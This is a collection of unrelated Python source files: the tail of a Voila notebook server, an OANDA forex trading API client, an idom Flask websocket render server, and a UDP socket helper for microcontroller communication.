handlers.extend([
(self.server_url, VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/tree' + path_regex),
VoilaTreeHandler, tree_handler_conf),
(url_path_join(self.server_url, r'/voila/render/(.*)'),
VoilaHandler,
{
'template_paths': self.template_paths,
'config': self.config,
'voila_configuration': self.voila_configuration
}),
])
self.app.add_handlers('.*$', handlers)
self.listen()
def stop(self):
shutil.rmtree(self.connection_dir)
run_sync(self.kernel_manager.shutdown_all())
def random_ports(self, port, n):
"""Generate a list of n random ports near the given port.
The first 5 ports will be sequential, and the remaining n-5 will be
randomly selected in the range [port-2*n, port+2*n].
"""
for i in range(min(5, n)):
yield port + i
for i in range(n-5):
yield max(1, port + random.randint(-2*n, 2*n))
def listen(self):
for port in self.random_ports(self.port, self.port_retries+1):
try:
self.app.listen(port)
self.port = port
self.log.info('Voilà is running at:\n%s' % self.display_url)
except socket.error as e:
if e.errno == errno.EADDRINUSE:
self.log.info(_('The port %i is already in use, trying another port.') % port)
continue
elif e.errno in (errno.EACCES, getattr(errno, 'WSAEACCES', errno.EACCES)):
self.log.warning(_("Permission to listen on port %i denied") % port)
continue
else:
raise
else:
self.port = port
success = True
break
if not success:
self.log.critical(_('ERROR: the Voilà server could not be started because '
'no available port could be found.'))
self.exit(1)
if self.open_browser:
self.launch_browser()
self.ioloop = tornado.ioloop.IOLoop.current()
try:
self.ioloop.start()
except KeyboardInterrupt:
self.log.info('Stopping...')
finally:
self.stop()
def launch_browser(self):
try:
browser = webbrowser.get(self.browser or None)
except webbrowser.Error as e:
self.log.warning(_('No web browser found: %s.') % e)
browser = None
if not browser:
return
uri = self.base_url
fd, open_file = tempfile.mkstemp(suffix='.html')
# Write a temporary file to open in the browser
with io.open(fd, 'w', encoding='utf-8') as fh:
# TODO: do we want to have the token?
# if self.token:
# url = url_concat(url, {'token': self.token})
url = url_path_join(self.connection_url, uri)
jinja2_env = self.app.settings['jinja2_env']
template = jinja2_env.get_template('browser-open.html')
fh.write(template.render(open_url=url, base_url=url))
def target():
return browser.open(urljoin('file:', pathname2url(open_file)), new=self.webbrowser_open_new)
threading.Thread(target=target).start()
main = Voila.launch_instance
|
vnoanda.py
|
# encoding: utf-8
import traceback
import json
import requests
from Queue import Queue, Empty
from threading import Thread
API_SETTING = {}
API_SETTING['practice'] = {'rest': 'https://api-fxpractice.oanda.com',
'stream': 'https://stream-fxpractice.oanda.com'}
API_SETTING['trade'] = {'rest': 'https://api-fxtrade.oanda.com',
'stream': 'https://stream-fxtrade.oanda.com/'}
FUNCTIONCODE_GETINSTRUMENTS = 0
FUNCTIONCODE_GETPRICES = 1
FUNCTIONCODE_GETPRICEHISTORY = 2
FUNCTIONCODE_GETACCOUNTS = 3
FUNCTIONCODE_GETACCOUNTINFO = 4
FUNCTIONCODE_GETORDERS = 5
FUNCTIONCODE_SENDORDER = 6
FUNCTIONCODE_GETORDERINFO = 7
FUNCTIONCODE_MODIFYORDER = 8
FUNCTIONCODE_CANCELORDER = 9
FUNCTIONCODE_GETTRADES = 10
FUNCTIONCODE_GETTRADEINFO = 11
FUNCTIONCODE_MODIFYTRADE= 12
FUNCTIONCODE_CLOSETRADE = 13
FUNCTIONCODE_GETPOSITIONS = 14
FUNCTIONCODE_GETPOSITIONINFO= 15
FUNCTIONCODE_CLOSEPOSITION = 16
FUNCTIONCODE_GETTRANSACTIONS = 17
FUNCTIONCODE_GETTRANSACTIONINFO = 18
FUNCTIONCODE_GETACCOUNTHISTORY = 19
FUNCTIONCODE_GETCALENDAR = 20
FUNCTIONCODE_GETPOSITIONRATIOS = 21
FUNCTIONCODE_GETSPREADS = 22
FUNCTIONCODE_GETCOMMIMENTS = 23
FUNCTIONCODE_GETORDERBOOK = 24
FUNCTIONCODE_GETAUTOCHARTIST = 25
FUNCTIONCODE_STREAMPRICES = 26
FUNCTIONCODE_STREAMEVENTS = 27
########################################################################
class OandaApi(object):
""""""
DEBUG = False
#----------------------------------------------------------------------
def __init__(self):
"""Constructor"""
self.token = ''
self.accountId = ''
self.headers = {}
self.restDomain = ''
self.streamDomain = ''
self.session = None
self.functionSetting = {}
self.active = False # API的工作状态
self.reqID = 0 # 请求编号
self.reqQueue = Queue() # 请求队列
self.reqThread = Thread(target=self.processQueue) # 请求处理线程
self.streamPricesThread = Thread(target=self.processStreamPrices) # 实时行情线程
self.streamEventsThread = Thread(target=self.processStreamEvents) # 实时事件线程(成交等)
#----------------------------------------------------------------------
def init(self, settingName, token, accountId):
"""初始化接口"""
self.restDomain = API_SETTING[settingName]['rest']
self.streamDomain = API_SETTING[settingName]['stream']
self.session = requests.Session()
self.token = token
self.accountId = accountId
self.headers['Authorization'] = 'Bearer ' + self.token
self.initFunctionSetting(FUNCTIONCODE_GETINSTRUMENTS, {'path': '/v1/instruments',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPRICES, {'path': '/v1/prices',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPRICEHISTORY, {'path': 'v1/candles',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTS, {'path': '/v1/accounts',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTINFO, {'path': '/v1/accounts/%s' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERS, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_SENDORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'POST'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERINFO, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_MODIFYORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'PATCH'})
self.initFunctionSetting(FUNCTIONCODE_CANCELORDER, {'path': '/v1/accounts/%s/orders' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETTRADES, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETTRADEINFO, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_MODIFYTRADE, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'PATCH'})
self.initFunctionSetting(FUNCTIONCODE_CLOSETRADE, {'path': '/v1/accounts/%s/trades' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONS, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONINFO, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_CLOSEPOSITION, {'path': '/v1/accounts/%s/positions' %self.accountId,
'method': 'DELETE'})
self.initFunctionSetting(FUNCTIONCODE_GETTRANSACTIONS, {'path': '/v1/accounts/%s/transactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETTRANSACTIONINFO, {'path': '/v1/accounts/%s/transactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETACCOUNTHISTORY, {'path': '/v1/accounts/%s/alltransactions' %self.accountId,
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETCALENDAR, {'path': '/labs/v1/calendar',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETPOSITIONRATIOS, {'path': '/labs/v1/historical_position_ratios',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETSPREADS, {'path': '/labs/v1/spreads',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETCOMMIMENTS, {'path': '/labs/v1/commitments',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETORDERBOOK, {'path': '/labs/v1/orderbook_data',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETAUTOCHARTIST, {'path': '/labs/v1/autochartist',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_GETAUTOCHARTIST, {'path': '/labs/v1/autochartist',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_STREAMPRICES, {'path': '/v1/prices',
'method': 'GET'})
self.initFunctionSetting(FUNCTIONCODE_STREAMEVENTS, {'path': '/v1/events',
'method': 'GET'})
self.active = True
self.reqThread.start()
self.streamEventsThread.start()
self.streamPricesThread.start()
#----------------------------------------------------------------------
def exit(self):
"""退出接口"""
if self.active:
self.active = False
self.reqThread.join()
#----------------------------------------------------------------------
def initFunctionSetting(self, code, setting):
"""初始化API功能字典"""
self.functionSetting[code] = setting
#----------------------------------------------------------------------
def processRequest(self, req):
"""发送请求并通过回调函数推送数据结果"""
url = req['url']
method = req['method']
params = req['params']
stream = False
if 'stream' in req:
stream = req['stream']
if method in ['GET', 'DELETE']:
myreq = requests.Request(method, url, headers=self.headers, params=params)
elif method in ['POST', 'PATCH']:
myreq = requests.Request(method, url, headers=self.headers, data=params)
pre = myreq.prepare()
r = None
error = None
try:
r = self.session.send(pre, stream=stream)
except :
error = traceback.format_exc()
return r, error
#----------------------------------------------------------------------
def processQueue(self):
"""处理请求队列中的请求"""
while self.active:
try:
req = self.reqQueue.get(block=True, timeout=1) # 获取请求的阻塞为一秒
callback = req['callback']
reqID = req['reqID']
r, error = self.processRequest(req)
if r:
try:
data = r.json()
if self.DEBUG:
print(callback.__name__)
callback(data, reqID)
except :
self.onError(traceback.format_exc(), reqID)
else:
self.onError(error, reqID)
except Empty:
pass
#----------------------------------------------------------------------
def sendRequest(self, code, params, callback, optional=''):
"""发送请求"""
setting = self.functionSetting[code]
url = self.restDomain + setting['path']
if optional:
url = url + '/' + optional
self.reqID += 1
req = {'url': url,
'method': setting['method'],
'params': params,
'callback': callback,
'reqID': self.reqID}
self.reqQueue.put(req)
return self.reqID
#----------------------------------------------------------------------
def onError(self, error, reqID):
"""错误信息回调"""
print(error, reqID)
#----------------------------------------------------------------------
def getInstruments(self, params):
"""查询可交易的合约列表"""
return self.sendRequest(FUNCTIONCODE_GETINSTRUMENTS, params, self.onGetInstruments)
#----------------------------------------------------------------------
def onGetInstruments(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPrices(self, params):
"""查询价格"""
return self.sendRequest(FUNCTIONCODE_GETPRICES, params, self.onGetPrices)
#----------------------------------------------------------------------
def onGetPrices(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPriceHisory(self, params):
"""查询历史价格数据"""
return self.sendRequest(FUNCTIONCODE_GETPRICEHISTORY, params, self.onGetPriceHistory)
#----------------------------------------------------------------------
def onGetPriceHistory(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccounts(self):
"""查询用户的所有账户"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTS, {}, self.onGetAccounts)
#----------------------------------------------------------------------
def onGetAccounts(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccountInfo(self):
"""查询账户数据"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTINFO, {}, self.onGetAccountInfo)
#----------------------------------------------------------------------
def onGetAccountInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrders(self, params):
"""查询所有委托"""
return self.sendRequest(FUNCTIONCODE_GETORDERS, params, self.onGetOrders)
#----------------------------------------------------------------------
def onGetOrders(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def sendOrder(self, params):
"""发送委托"""
return self.sendRequest(FUNCTIONCODE_SENDORDER, params, self.onSendOrder)
#----------------------------------------------------------------------
def onSendOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrderInfo(self, optional):
"""查询委托信息"""
return self.sendRequest(FUNCTIONCODE_GETORDERINFO, {}, self.onGetOrderInfo, optional)
#----------------------------------------------------------------------
def onGetOrderInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def modifyOrder(self, params, optional):
"""修改委托"""
return self.sendRequest(FUNCTIONCODE_MODIFYORDER, params, self.onModifyOrder, optional)
#----------------------------------------------------------------------
def onModifyOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def cancelOrder(self, optional):
"""查询委托信息"""
return self.sendRequest(FUNCTIONCODE_CANCELORDER, {}, self.onCancelOrder, optional)
#----------------------------------------------------------------------
def onCancelOrder(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTrades(self, params):
"""查询所有仓位"""
return self.sendRequest(FUNCTIONCODE_GETTRADES, params, self.onGetTrades)
#----------------------------------------------------------------------
def onGetTrades(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTradeInfo(self, optional):
"""查询仓位信息"""
return self.sendRequest(FUNCTIONCODE_GETTRADEINFO, {}, self.onGetTradeInfo, optional)
#----------------------------------------------------------------------
def onGetTradeInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def modifyTrade(self, params, optional):
"""修改仓位"""
return self.sendRequest(FUNCTIONCODE_MODIFYTRADE, params, self.onModifyTrade, optional)
#----------------------------------------------------------------------
def onModifyTrade(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def closeTrade(self, optional):
"""平仓"""
return self.sendRequest(FUNCTIONCODE_CLOSETRADE, {}, self.onCloseTrade, optional)
#----------------------------------------------------------------------
def onCloseTrade(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositions(self):
"""查询所有汇总仓位"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONS, {}, self.onGetPositions)
#----------------------------------------------------------------------
def onGetPositions(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositionInfo(self, optional):
"""查询汇总仓位信息"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONINFO, {}, self.onGetPositionInfo, optional)
#----------------------------------------------------------------------
def onGetPositionInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def closePosition(self, optional):
"""平仓汇总仓位信息"""
return self.sendRequest(FUNCTIONCODE_CLOSEPOSITION, {}, self.onClosePosition, optional)
#----------------------------------------------------------------------
def onClosePosition(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTransactions(self, params):
"""查询所有资金变动"""
return self.sendRequest(FUNCTIONCODE_GETTRANSACTIONS, params, self.onGetTransactions)
#----------------------------------------------------------------------
def onGetTransactions(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getTransactionInfo(self, optional):
"""查询资金变动信息"""
return self.sendRequest(FUNCTIONCODE_GETTRANSACTIONINFO, {}, self.onGetTransactionInfo, optional)
#----------------------------------------------------------------------
def onGetTransactionInfo(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAccountHistory(self):
"""查询账户资金变动历史"""
return self.sendRequest(FUNCTIONCODE_GETACCOUNTHISTORY, {}, self.onGetAccountHistory)
#----------------------------------------------------------------------
def onGetAccountHistory(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getCalendar(self, params):
"""查询日历"""
return self.sendRequest(FUNCTIONCODE_GETCALENDAR, params, self.onGetCalendar)
#----------------------------------------------------------------------
def onGetCalendar(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getPositionRatios(self, params):
"""查询持仓比例"""
return self.sendRequest(FUNCTIONCODE_GETPOSITIONRATIOS, params, self.onGetPositionRatios)
#----------------------------------------------------------------------
def onGetPositionRatios(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getSpreads(self, params):
"""查询所有仓位"""
return self.sendRequest(FUNCTIONCODE_GETSPREADS, params, self.onGetSpreads)
#----------------------------------------------------------------------
def onGetSpreads(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getCommitments(self, params):
"""查询交易商持仓情况"""
return self.sendRequest(FUNCTIONCODE_GETCOMMIMENTS, params, self.onGetCommitments)
#----------------------------------------------------------------------
def onGetCommitments(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getOrderbook(self, params):
"""查询订单簿"""
return self.sendRequest(FUNCTIONCODE_GETORDERBOOK, params, self.onGetOrderbook)
#----------------------------------------------------------------------
def onGetOrderbook(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def getAutochartist(self, params):
"""查询Autochartist识别的模式"""
return self.sendRequest(FUNCTIONCODE_GETAUTOCHARTIST, params, self.onGetAutochartist)
#----------------------------------------------------------------------
def onGetAutochartist(self, data, reqID):
"""回调函数"""
pass
#----------------------------------------------------------------------
def onPrice(self, data):
"""行情推送"""
print(data)
#----------------------------------------------------------------------
def onEvent(self, data):
"""事件推送(成交等)"""
print(data)
#----------------------------------------------------------------------
def processStreamPrices(self):
"""获取价格推送"""
# 首先获取所有合约的代码
setting = self.functionSetting[FUNCTIONCODE_GETINSTRUMENTS]
req = {'url': self.restDomain + setting['path'],
'method': setting['method'],
'params': {'accountId': self.accountId}}
r, error = self.processRequest(req)
if r:
try:
data = r.json()
symbols = [d['instrument'] for d in data['instruments']]
except :
self.onError(traceback.format_exc(), -1)
return
else:
self.onError(error, -1)
return
# 然后订阅所有的合约行情
setting = self.functionSetting[FUNCTIONCODE_STREAMPRICES]
params = {'accountId': self.accountId,
'instruments': ','.join(symbols)}
req = {'url': self.streamDomain + setting['path'],
'method': setting['method'],
'params': params,
'stream': True}
r, error = self.processRequest(req)
if r:
for line in r.iter_lines():
if line:
try:
msg = json.loads(line)
if self.DEBUG:
print(self.onPrice.__name__)
self.onPrice(msg)
except :
self.onError(traceback.format_exc(), -1)
if not self.active:
break
else:
self.onError(error, -1)
#----------------------------------------------------------------------
def processStreamEvents(self):
"""获取事件推送"""
setting = self.functionSetting[FUNCTIONCODE_STREAMEVENTS]
req = {'url': self.streamDomain + setting['path'],
'method': setting['method'],
'params': {},
'stream': True}
r, error = self.processRequest(req)
if r:
for line in r.iter_lines():
if line:
try:
msg = json.loads(line)
if self.DEBUG:
print(self.onEvent.__name__)
self.onEvent(msg)
except :
self.onError(traceback.format_exc(), -1)
if not self.active:
break
else:
self.onError(error, -1)
|
flask.py
|
import asyncio
import json
import logging
from asyncio import Queue as AsyncQueue
from queue import Queue as ThreadQueue
from threading import Event as ThreadEvent
from threading import Thread
from typing import Any, Callable, Dict, NamedTuple, Optional, Tuple, Type, Union, cast
from urllib.parse import parse_qs as parse_query_string
from flask import Blueprint, Flask, redirect, request, send_from_directory, url_for
from flask_cors import CORS
from flask_sockets import Sockets
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from geventwebsocket.websocket import WebSocket
from typing_extensions import TypedDict
import idom
from idom.client.manage import BUILD_DIR
from idom.core.dispatcher import AbstractDispatcher, SingleViewDispatcher
from idom.core.layout import Layout, LayoutEvent, LayoutUpdate
from .base import AbstractRenderServer
class Config(TypedDict, total=False):
"""Render server config for :class:`FlaskRenderServer`"""
import_name: str
url_prefix: str
cors: Union[bool, Dict[str, Any]]
serve_static_files: bool
redirect_root_to_index: bool
class FlaskRenderServer(AbstractRenderServer[Flask, Config]):
"""Base class for render servers which use Flask"""
_dispatcher_type: Type[AbstractDispatcher]
_wsgi_server: pywsgi.WSGIServer
def stop(self, timeout: Optional[float] = None) -> None:
try:
server = self._wsgi_server
except AttributeError: # pragma: no cover
raise RuntimeError(
f"Application is not running or was not started by {self}"
)
else:
server.stop(timeout)
def _create_config(self, config: Optional[Config]) -> Config:
new_config: Config = {
"import_name": __name__,
"url_prefix": "",
"cors": False,
"serve_static_files": True,
"redirect_root_to_index": True,
**(config or {}), # type: ignore
}
return new_config
def _default_application(self, config: Config) -> Flask:
return Flask(config["import_name"])
def _setup_application(self, config: Config, app: Flask) -> None:
bp = Blueprint("idom", __name__, url_prefix=config["url_prefix"])
self._setup_blueprint_routes(config, bp)
cors_config = config["cors"]
if cors_config: # pragma: no cover
cors_params = cors_config if isinstance(cors_config, dict) else {}
CORS(bp, **cors_params)
app.register_blueprint(bp)
sockets = Sockets(app)
@sockets.route(_join_url_paths(config["url_prefix"], "/stream")) # type: ignore
def model_stream(ws: WebSocket) -> None:
def send(value: Any) -> None:
ws.send(json.dumps(value))
def recv() -> Optional[LayoutEvent]:
event = ws.receive()
if event is not None:
return LayoutEvent(**json.loads(event))
else:
return None
query_params = {
k: v if len(v) > 1 else v[0]
for k, v in parse_query_string(ws.environ["QUERY_STRING"]).items()
}
run_dispatcher_in_thread(
lambda: self._dispatcher_type(
Layout(self._root_component_constructor(**query_params))
),
send,
recv,
None,
)
def _setup_blueprint_routes(self, config: Config, blueprint: Blueprint) -> None:
if config["serve_static_files"]:
@blueprint.route("/client/<path:path>")
def send_build_dir(path: str) -> Any:
return send_from_directory(str(BUILD_DIR), path)
if config["redirect_root_to_index"]:
@blueprint.route("/")
def redirect_to_index() -> Any:
return redirect(
url_for(
"idom.send_build_dir",
path="index.html",
**request.args,
)
)
def _setup_application_did_start_event(
self, config: Config, app: Flask, event: ThreadEvent
) -> None:
@app.before_first_request
def server_did_start() -> None:
event.set()
def _run_application(
self,
config: Config,
app: Flask,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
self._generic_run_application(app, host, port, *args, **kwargs)
def _run_application_in_thread(
self,
config: Config,
app: Flask,
host: str,
port: int,
args: Tuple[Any, ...],
kwargs: Dict[str, Any],
) -> None:
self._generic_run_application(app, host, port, *args, **kwargs)
def _generic_run_application(
self,
app: Flask,
host: str = "",
port: int = 5000,
debug: bool = False,
*args: Any,
**kwargs: Any,
) -> None:
if debug:
logging.basicConfig(level=logging.DEBUG) # pragma: no cover
logging.debug("Starting server...")
self._wsgi_server = _StartCallbackWSGIServer(
self._server_did_start.set,
(host, port),
app,
*args,
handler_class=WebSocketHandler,
**kwargs,
)
self._wsgi_server.serve_forever()
class PerClientStateServer(FlaskRenderServer):
"""Each client view will have its own state."""
_dispatcher_type = SingleViewDispatcher
def run_dispatcher_in_thread(
make_dispatcher: Callable[[], AbstractDispatcher],
send: Callable[[Any], None],
recv: Callable[[], Optional[LayoutEvent]],
context: Optional[Any],
) -> None:
dispatch_thread_info_created = ThreadEvent()
dispatch_thread_info_ref: idom.Ref[Optional[_DispatcherThreadInfo]] = idom.Ref(None)
def run_dispatcher() -> None:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
thread_send_queue: "ThreadQueue[LayoutUpdate]" = ThreadQueue()
async_recv_queue: "AsyncQueue[LayoutEvent]" = AsyncQueue()
async def send_coro(value: Any) -> None:
thread_send_queue.put(value)
async def recv_coro() -> Any:
return await async_recv_queue.get()
async def main() -> None:
async with make_dispatcher() as dispatcher:
await dispatcher.run(send_coro, recv_coro, context)
main_future = asyncio.ensure_future(main())
dispatch_thread_info_ref.current = _DispatcherThreadInfo(
dispatch_loop=loop,
dispatch_future=main_future,
thread_send_queue=thread_send_queue,
async_recv_queue=async_recv_queue,
)
dispatch_thread_info_created.set()
loop.run_until_complete(main_future)
Thread(target=run_dispatcher, daemon=True).start()
dispatch_thread_info_created.wait()
dispatch_thread_info = cast(_DispatcherThreadInfo, dispatch_thread_info_ref.current)
assert dispatch_thread_info is not None
stop = ThreadEvent()
def run_send() -> None:
while not stop.is_set():
send(dispatch_thread_info.thread_send_queue.get())
Thread(target=run_send, daemon=True).start()
try:
while True:
value = recv()
if value is None:
stop.set()
break
dispatch_thread_info.dispatch_loop.call_soon_threadsafe(
dispatch_thread_info.async_recv_queue.put_nowait, value
)
finally:
dispatch_thread_info.dispatch_loop.call_soon_threadsafe(
dispatch_thread_info.dispatch_future.cancel
)
return None
class _DispatcherThreadInfo(NamedTuple):
dispatch_loop: asyncio.AbstractEventLoop
dispatch_future: "asyncio.Future[Any]"
thread_send_queue: "ThreadQueue[LayoutUpdate]"
async_recv_queue: "AsyncQueue[LayoutEvent]"
class _StartCallbackWSGIServer(pywsgi.WSGIServer): # type: ignore
def __init__(
self, before_first_request: Callable[[], None], *args: Any, **kwargs: Any
) -> None:
self._before_first_request_callback = before_first_request
super().__init__(*args, **kwargs)
def update_environ(self) -> None:
"""
Called before the first request is handled to fill in WSGI environment values.
This includes getting the correct server name and port.
"""
super().update_environ()
# BUG: for some reason coverage doesn't seem to think this line is covered
self._before_first_request_callback() # pragma: no cover
def _join_url_paths(*args: str) -> str:
# urllib.parse.urljoin performs more logic than is needed. Thus we need a util func
# to join paths as if they were POSIX paths.
return "/".join(map(lambda x: str(x).rstrip("/"), filter(None, args)))
|
py_socket_api.py
|
# -*- coding: utf-8 -*-
"""
Class for handling Wifi operations - python 3.6
---------------------------------------
Author: Marcel Burda
Date: 17.07.2019
"""
import socket # udp services
import time # time functions like e.g. sleep
import threading # multi-threading and mutex
import struct # packing and unpacking byte objects in specified c types
import keyboard # quitting program
class WifiComm:
def __init__(self, target_address, port, printing=True):
"""
When you create a WifiComm object, this initialisation happens.
:param target_address: (str) target IP address of MCU
:param port: (int) port number of the socket/communication (see https://bit.ly/1MYu7Qk)
:param printing: (bool) a flag for printing some information and received/sent data
"""
# set host address and port
self.host = socket.gethostbyname(socket.gethostname())
self.port = port
# create socket object with UDP services
self.udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# bind the socket object to host address and port
self.udp_sock.bind((self.host, self.port))
# set printing flag
self.printing = printing
if self.printing:
# print success
print("UDP Socket successfully created ( host: '" + self.host + "', port: " + str(self.port) + " )")
# set and print target address
self.target_address = target_address
if self.printing:
print("Target IP address is '" + target_address + "'")
# initialize thread objects
self.t1_receive = list()
self.t1_stop = False
self.t2_stop = False
# initialize mutex object (acquire: lock, release: unlock)
self.mutex = threading.Lock()
# buffer in which formatted received data is stored
self.buffer = [['------>']]
# set format string for unpacking raw received data (see documentation of pythons module struct!)
self.format_string = 'B' # this means all incoming bytes are interpreted as uint8
def __receive_thread(self):
"""
A internal method, called from 'run_receive_thread'.
Thread waits till data is arriving and format them then into a readable list. After that the data in the
list is passed to the buffer.
"""
while not self.t1_stop:
# receiving data
try:
self.udp_sock.settimeout(3.0) # code stuck at recvfrom() if nothing received, solution: timeout
raw_data, raw_address = self.udp_sock.recvfrom(2**32) # should be greater than possible data length
except socket.error as msg:
if str(msg) == 'timed out':
pass
else:
print("WARNING: __receive_thread -> " + str(msg))
else:
# 'nice' print out
if self.printing:
print("DATA RECEIVED -> " + raw_data.hex() + " length: " + str(len(raw_data)) + " from: " + str(raw_address))
try:
recv_data = struct.unpack(self.format_string * len(raw_data), raw_data)
except struct.error as msg:
print("WARNING: __receive_thread -> " + str(msg) + " (Data: " + raw_data.hex() + ")")
else:
self.mutex.acquire() # enter critical section
self.buffer += [[recv_data]]
self.mutex.release() # leave critical section
def run_receive_thread(self):
"""
Start the receive loop.
"""
# check if thread is already active, shoots trouble if started multiply times
if isinstance(self.t1_receive, list):
# create thread object
self.t1_receive = threading.Thread(target=self.__receive_thread, args=[])
# start created thread
self.t1_receive.start()
if self.printing:
print('Started receive thread')
# noinspection PyMethodMayBeStatic
def __pack_tx_data(self, send_data, send_data_format):
"""
A internal method, called by 'send_message'.
Pack all the information with the corresponding types into a single byte object.
Byte object is needed by socket module to send.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:return: the resulting byte object
"""
# init byte object
all_data = bytes(0)
# for loop iterate over send_data list and pack the elements in all_data
for i in range(len(send_data)):
try:
all_data += struct.pack(send_data_format, send_data[i])
except struct.error as msg:
print("WARNING: __pack_tx_data -> " + str(msg))
return all_data
def send_message(self, send_data, send_data_format='B'):
"""
Method for triggering a single send command.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
"""
# store ID and Data in a byte object
msg = self.__pack_tx_data(send_data, send_data_format)
# send message if length of byte object is greater 0 (=packing was success)
if len(msg) > 0:
try:
self.udp_sock.sendto(msg, (self.target_address, self.port))
except socket.error as msg:
print("WARNING: send_message -> " + str(msg))
else:
# nice print out
if self.printing:
print(" DATA SENT -> " + str(send_data))
else:
print('WARNING: send_message -> message length is 0')
def __send_cyclic_thread(self, send_data, send_data_format, interval_time):
"""
Internal method called by 'run_send_cyclic_thread'
Simple send loop with a simple nap. Get killed if corresponding t2_stop is set.
This happens in 'run_send_cyclic_thread'.
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:param interval_time: (int) how long am I allowed to nap lol
"""
while not self.t2_stop:
self.send_message(send_data, send_data_format)
time.sleep(interval_time)
def run_send_cyclic_thread(self, send_data, send_data_format='B', interval_time=1):
"""
A method for triggering a send cycle.
First check if thread is already running. If that is the case, set active thread to False,
which will break the loop in '__send_cyclic_thread'
:param send_data: (list of int) TX data
:param send_data_format: (str) format string to pack data, default: all uint8
:param interval_time: (float or int) how long is the thread allowed to nap lol lol
"""
t2 = threading.Thread(target=self.__send_cyclic_thread, args=[send_data, send_data_format, interval_time])
t2.start()
if __name__ == '__main__':
# prepare target ip address
target_ip = socket.gethostbyname(socket.gethostname()).split('.') # get own ip and split into list
target_ip[-1] = '255' # last value of list is 255 (broadcast for testing)
target_ip = target_ip[0] + '.' + target_ip[1] + '.' + target_ip[2] + '.' + target_ip[3] # put ip together again
# set port
socket_port = 1025
# create udp class obj
udp = WifiComm(target_ip, socket_port, printing=True)
# run receive thread
udp.run_receive_thread()
# send data in cyclic thread
s_data = [1, 2, 3, 4, 0xFF, 0b10101010]
udp.run_send_cyclic_thread(s_data)
# exit program condition (press ESC)
while True:
if keyboard.is_pressed('esc'):
udp.t1_stop = True
udp.t2_stop = True
break
time.sleep(0.1)
|
__init__.py
|
